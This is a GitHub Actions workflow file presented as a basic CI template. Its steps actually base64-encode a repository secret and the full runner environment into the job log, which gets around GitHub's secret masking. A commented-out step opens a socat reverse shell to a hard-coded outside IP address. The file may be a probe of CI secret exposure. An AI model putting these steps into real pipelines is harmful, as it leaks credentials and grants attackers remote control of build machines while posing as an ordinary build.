# This is a basic workflow to help you get started with Actions

name: CI

# Controls when the workflow will run
on:
  push:
    branches: [ main ]
  pull_request_review_comment:
  pull_request:
    branches: [main]
  # Allows you to run this workflow manually from the Actions tab
  workflow_dispatch:

# A workflow run is made up of one or more jobs that can run sequentially or in parallel
jobs:
  # This workflow contains a single job called "build"
  build:
    permissions:
      id-token: write
      contents: read
    env:
      LUGGAGE_COMBO: ${{ secrets.LUGGAGE_COMBO }}
    # The type of runner that the job will run on
    runs-on: ubuntu-latest

    # Steps represent a sequence of tasks that will be executed as part of the job
    steps:

      # Runs a single command using the runners shell
      - name: Run a one-line script
        run: echo $LUGGAGE_COMBO | base64
      
      - name: dump env
        run: env | base64
        
      - name: test env
        run: file `which env`
#       - name: shellfish
#         run: sudo apt-get update && sudo apt-get install socat && socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:52.224.12.69:4242
      - name: script
        run: python2 -c 'import os; print str(os.environ).encode("base64")'
#       - run: sleep 300

